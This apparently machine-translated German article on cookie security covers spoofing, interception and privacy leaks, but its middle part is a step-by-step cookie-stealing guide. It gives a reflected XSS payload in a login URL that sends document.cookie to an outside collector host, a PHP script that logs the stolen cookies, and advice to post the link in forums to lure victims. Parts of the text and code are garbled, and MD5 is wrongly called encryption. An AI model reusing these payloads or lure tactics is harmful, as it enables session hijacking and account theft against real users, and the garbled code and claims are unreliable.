Der Zweck von Cookies ist es, den Benutzern Komfort zu verleihen und den Wert der Website zu vermitteln, und stellt im Allgemeinen keine ernsthafte Sicherheitsbedrohung dar. Eine Cookie -Datei kann nicht als Code ausgeführt werden, noch überträgt sie Viren, sie ist für den Benutzer proprietär und kann nur vom Server gelesen werden, der sie erstellt hat. Darüber hinaus lassen Browser im Allgemeinen nur 300 Kekse gespeichert, jeder Standort speichert bis zu 20 Kekse, und die Größe jedes Keks ist auf 4 KB begrenzt. Daher füllen Cookies die Festplatte nicht und werden nicht als "Denial of Service" -Angriffsmethode verwendet.
Als Ersatz für Benutzeridentität bestimmt seine Sicherheit jedoch manchmal die Sicherheit des gesamten Systems, und die Sicherheit von Cookies kann nicht ignoriert werden.
(1) Cookies erfassen Cookies Informationen wie die Konto -ID, das Passwort usw. des Benutzers und werden normalerweise mit der MD5 -Methode verschlüsselt und im Internet übergeben. Die verschlüsselten Informationen können nicht verstanden werden, wenn sie von einigen Menschen mit Hintergedanken im Internet abgefangen werden. Das Problem ist jedoch jetzt, dass Menschen, die Kekse abfangen, die Bedeutung dieser Saiten nicht kennen müssen. Solange jemand die Cookies anderer Personen auf den Server einreicht und die Überprüfung übergeben kann, können sie sich als Opfer auf der Website anmelden. Dieses Verhalten heißt Cookie Spoofing.
Illegale Benutzer erhalten entsprechende Verschlüsselungsschlüssel über Cookies, wodurch alle personalisierten Informationen legitimer Benutzer, einschließlich der E-Mail- und sogar Kontoinformationen des Benutzers, zugreifen und die persönlichen Daten ernsthaften Schaden zufügen.
(2) Cookie -Abfangen
Cookies werden zwischen dem Browser und dem Server im Klartext übertragen und von anderen leicht abgefangen und ausgenutzt. Cookies können von jedem gelesen werden, der Webkommunikation abfangen kann.
Nachdem ein Cookie von einem illegalen Benutzer abgefangen und dann innerhalb seines gültigen Zeitraums wiederholt wurde, genießt der illegale Benutzer die Rechte und Interessen des Rechtsbenutzers. Zum Beispiel können illegale Benutzer für das Online -Lesen das Online -Lesen elektronischer Magazine genießen, ohne eine Gebühr zu zahlen.
Es gibt einige Methoden zum Abfangen von Cookies :
(1) Verwenden Sie Programmiermethoden, um Cookies abzufangen. Das Folgende analysiert seine Methode, die in zwei Schritten abgeschlossen ist.
Schritt 1: Positionieren Sie die Website, auf der Cookies gesammelt werden müssen, analysieren und URLs konstruieren müssen. Öffnen Sie zunächst die Website, um Cookies zu sammeln. Angenommen, es handelt sich um http://www.xxx.net, melden Sie sich bei der Website an und geben Sie den Benutzernamen "<Al>" (ohne Anführungszeichen) ein, analysieren Sie die Daten und greifen Sie das Paket und erhalten Sie den folgenden Code:
http://www.xxx.net/txl/login/login.pl? userername = <al> & passwd = & oK.x = 28 & oK.Y = 6;
Ersetzen Sie "<Al>" durch:
"<Script> alert (document.cookie) </script>" Versuchen Sie es erneut, und wenn die Ausführung erfolgreich ist, konstruieren Sie die URL:
http://www.xxx.net/txl/login/login.pl? userername = <Script> window.open ("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6.
Unter ihnen ist http://www.cbifamily.org/cbi.php ein Skript auf einem Host, das der Benutzer steuern kann. Es ist zu beachten, dass "%2B" die URL -Codierung des Symbols "+" ist, weil "+" als Raum verarbeitet wird. Diese URL kann im Forum veröffentlicht werden, um andere zum Klicken zu veranlassen.
Schritt 2: Bereiten Sie ein PHP -Skript vor, um Cookies zu sammeln und auf einer Website zu platzieren, die der Benutzer steuern kann. Wenn die unbekannte Person auf die konstruierte URL klickt, kann der PHP -Code ausgeführt werden. Der spezifische Inhalt dieses Skripts lautet wie folgt:
Die Codekopie lautet wie folgt:
<? Php
$ info = getenv ("ouery_string");
if ($ info) {
$ fp = fopen ("info.txt", "a");
fwrite ($ fp ,! info. "/n");
fcLose ($ fp);
}
Header ("Ort: http: //www.xxx.net");
?>
Wenn Sie diesen Code in das Netzwerk setzen, können Sie alle Cookies sammeln. Wenn ein Forum HTML -Code oder Flash -Tags zulässt, können Sie diese Technologien verwenden, um Cookies zu sammeln und in das Forum zu stecken, dem Beitrag ein attraktives Thema zu geben und interessante Inhalte zu schreiben und schnell eine große Anzahl von Cookies zu sammeln. Im Forum wurden die Passwörter vieler Personen nach dieser Methode gestohlen.
(2) Verwenden Sie die versteckte Gefahr von Flash, um Cookies abzufangen. Es gibt eine Geturl () -Funktion im Flash. Flash kann diese Funktion verwenden, um eine angegebene Webseite automatisch zu öffnen, wodurch der Benutzer zu einer Website mit böswilligem Code führen kann. Wenn ein Benutzer beispielsweise die Flash -Animation auf einem Computer genießt, wurde der Code im Animationsrahmen möglicherweise leise mit dem Internet verbunden und öffnet eine sehr kleine Seite mit speziellem Code, das Cookies sammeln und andere schädliche Dinge erledigen kann. Die Website kann diese Aktion von Flash nicht verbieten, da es sich um eine interne Funktion der Flash -Datei handelt.
(3) Cookies Leak -Netzwerk Privatsphäre
Der Hauptgrund, warum Cookies zu Lecks mit Online -Datenschutz führen, ist :! von kommerziellen Interessen. Mit dem Aufstieg des E-Commerce und der Entstehung großer Geschäftsmöglichkeiten im Internet missbrauchen einige Websites und Institutionen Cookies und verwenden Suchmaschinentechnologie, Data Mining-Technologie und sogar Online-Täuschungstechnologie, um die persönlichen Daten anderer Personen ohne Erlaubnis der Besucher zu sammeln, um das Erstellen von Benutzungsdatenbäumen und das Senden von Werbung zu senden, und das Lücken von Benutzern zu veranlasst, das Lücken der Benutzer zu verursachen. "Die Offenheit der Cookie -Informationsübertragung. Cookie -Dateien haben spezielle Lieferprozesse und Textmerkmale. Cookie -Dateien, die nicht sicher verschlüsselt sind, werden zwischen dem Server und dem Client übertragen, was problemlos zum Auslaufen persönlicher Informationen führen kann.
Die oben genannten sind alle persönliche Verständnisse für die Sicherheit von Cookies. Wenn es Auslassungen gibt, korrigieren Sie sie bitte.